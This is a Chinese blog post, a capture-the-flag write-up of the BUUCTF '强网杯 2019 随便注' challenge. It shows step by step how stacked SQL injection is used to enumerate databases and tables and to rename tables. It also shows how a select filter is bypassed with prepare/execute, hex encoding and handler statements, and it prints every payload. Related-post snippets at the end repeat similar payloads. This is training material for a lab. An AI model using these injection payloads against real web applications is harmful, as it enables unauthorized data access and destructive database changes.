BUUCTF-[强网杯 2019]随便注1

最新推荐文章于 2024-04-07 15:16:39 发布
最新推荐文章于 2024-04-07 15:16:39 发布
阅读量597 收藏 1
点赞数 2
分类专栏: BUUCTF 文章标签: 安全漏洞 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/120119771
版权

目录

题目:

方法:

方法1:

方法2 :使用set设置变量,prepare设置sql语句,execute执行函数

方法3:使用mysql专属handler语句,类似于select

其他问题:

1、url中#是特殊字符,参数中有#号的时候需要进行url编码。

 2、url中空格变成+和空格变成%20问题

题目:

方法:

只有输入1和2 才有结果

 

 发现输出是两列,一列是键,一列是值

测试是什么闭合

 输入1'发现有个报错

我们复制near后面的代码,通过一个字符一个字符的删除,发现是:

单引号 单引号 1 单引号 单引号 单引号

所以这不是双引号闭合,而是一个单引号闭合。

 测试输出有几列

payload:?inject=1' order by 3--+

发现报错,by 2的时候没有报错,说明输出有两列 

输入payload:-1' or 1=1--+

输出了所有的键值对,但是没有flag。继续注入

输入payload:-1' union select 1,2#

发现报错,过滤掉了select、update、delete、drop、insert、where且不区分大小写。 

因为过滤了update所以updatexml报错注入不行,换另一个报错注入

extractvalue(1,concat(0x7e,(想要输入的sql语句),0x7e))

payload:?inject=1'and extractvalue(1,concat(0x7e,(database()),0x7e))--+

 

 显示当前的数据库名字是supersqli

 因为过滤了select等,报错注入得到的东西很少,尝试使用堆叠注入

在SQL中,分号(;)是用来表示一条sql语句的结束。我们在上一条sql语句后面加上一个 ; 结束这个sql语句,然后继续构造下一条语句,那么下一条语句也会被执行。他与union的区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的sql语句。

堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行。

输入payload:?inject=1';show databases--+

查出所有数据库名。 

  

输入payload:?inject=1';show tables--+

可以使用show tables from 数据库名
因为这里使用的是supersqli数据库所以我们查到的是supersqli数据库的所有表名

 

输入payload:?inject=1';show columns from `1919810931114514`--+
payload:?inject=1';show columns from words--+

#数字串为表名的表操作时要加反引号
#show columns 必须加上from table_name使用

爆出1919810931114514中的所有列,发现flag处于191981093114514这个表中。然后只有一列、words表有两列,所以题目查询的是words这个表。

 

现在的问题就是如何得到flag的值

方法1:

因为我们知道输入框中查询的语句为:

(1)select * from words where id=''
或者
(2)select id, data from words where id =''

 所以我们可以让程序中这个sql语句来帮我们查询到flag的值。而且没有过滤alter和rename。

若为第一种,我们把words改为其他值(必须先改words,在改191,否则就不会修改成功且必须一次性改完否则将words改成123之后再去改191这个表,就会提示找不到words这个表(因为前面要执行对words这个表的查询操作)),然后把1919810931114514这个表改成words。然后再增加一个id字段。最后在构造where后面的语句使其为恒真即可。

payload:?inject=1';rename table `words` to `123`;rename table `1919810931114514` to `words`;alter table `words` add id int(10);--+ 

然后执行

payload:?inject=1'or 1=1--+

得出flag,说明为第一种。 

若为第二种还需要将flag列名改成data。

方法2 :使用set设置变量,prepare设置sql语句,execute执行函数

payload:?inject=-1';set @sql=concat('s','elect flag from `1919810931114514`');prepare sql1 from @sql;execute sql1--+

但是我们发现会有提示出现,strstr表示查找第二个字符串再第一个字符串中的首次出现,没有则返回flase,且区分大小写。 所以我们可以用大小写绕过。因为是与运算,所以将set或者prepare其中一个进行大小写绕过即可。通过使用contact字符串连接函数绕过对select的过滤

payload:?inject=-1';Set @sql=concat('s','elect flag from `1919810931114514`');prepare sql1 from @sql;execute sql1--+

绕过select还可以用16进制 

payload:?inject=-1';Set@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare sql1 from @a;execute sql1--+

方法3:使用mysql专属handler语句,类似于select

mysql查询语句-handler

handler  tbl_name open (as yourname); #指定数据表进行载入并将返回句柄重命名
handler tbl_name read first; #读取指定表/句柄的首行数据
handler tbl_name read next; #读取指定表/句柄的下一行数据
handler tbl_name read next; #读取指定表/句柄的下一行数据

...
handler yunensec close; #关闭句柄  

payload:?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first--+

其他问题:

1、url中#是特殊字符,参数中有#号的时候需要进行url编码。

 

 2、url中空格变成+和空格变成%20问题

会发现输入框中输入空格和在hackbar中输入空格最后在url中空格的显示是不一样的,输入框中空格会变成+;hackbar中会变成空格的url编码形式%20。但不影响因为url中会把+当中空格处理

可能原因是配置问题:

_Monica_
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
buuctf web题解之[强网杯 2019]随便1详解(1)
最新发布
m0_60666841的博客
04-07 345
讲解视频,并且后续会持续更新**
BUUCTF [强网杯 2019]随便1(另一种方法)
weixin_53955759的博客
06-21 363
打开环境,先判断一下是单引号还是双引号闭合
一篇文章带你搞定CTF中http的常见应用
csjjjd的博客
12-16 525
这里最终条件要求URL解码一次后会直接变成admin就可以输出flag,而且一开始还要绕过强等于,已经提示的很明显了,一开始就是要传入一个URL形式的字符串来绕过强相等,如果一开始不传URL编码,那后面那个URL解码岂不就是没有用了,(当然你可以私下用在线工具进行url编码,在URL编码中,每个百分号 "%" 后跟上两位十六进制数表示相应的字符,只是你在网页上输入网址经过url时不会自动帮你编码,也就是输入啥经过url后就是啥)这里是url编码在ctf的使用,很经典。
CTF萌新日记——绕过
qq_45427131的博客
07-19 992
CTF萌新日记——绕过
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 296
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
关于空格变%20问题的解决方案
热门推荐
shuytu
03-15 1万+
关于空格变%20问题的解决方案 问题: 设置web服务器Tomcat6.0地址在你 Program File下,在上传文件时出现识别不了空格,将地址中的空格变成了%20: Program%20Files%20(x86) Apache%20Software%20Foundation 解决方案: 有解决方法(1),使用repaceAll("%20",'')替换后,只能解决空格问题。但是路径
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3921
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
[强网杯 2019]随便 1
tomatoff的博客
03-14 2802
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 1736
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF---[强网杯 2019]随便1
2201_75556700的博客
01-04 417
8.更改表名列名(因为查询是查id但是id在words中而flag却在另一个表中,于是我们就想到把两个表名换一下,然后flag换为id)是将flag的属性换位id属性。4.接着尝试order by+数字(1' order by 2#)(2' order by 3#)执行第二句的时候会报错,说明表中只有两列数据。5.接下来使用联合查询1' union select 1,2(但是select被过滤了)9.使用1’ or ‘1’='1查看表的内容就可以获得flag。3.尝试0' or '1'='1,发现有回显。
BUUCTF闯关日记04--[强网杯 2019]随便1
qq_64201116的博客
05-12 301
进入页面 发现有一个提交,按一下,可以意到右上角出现了url新的传参?inject=1同时意到,多了一些数组 然后就可以尝试闭合符号,一般都是有单引号或者双引号的,逐个尝试 这个是双引号的回显 这个是单引号的回显 单引号报错了,说明数据库是单引号闭合的.然后就是最基础的准备看是否有sql入,有几个字段,有没有显错入 第一步:1' and 1=1--+ //判断and是否过滤 第二步:1' and 1=2--+ //判断是否存在sql入 第三步:1' o...
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值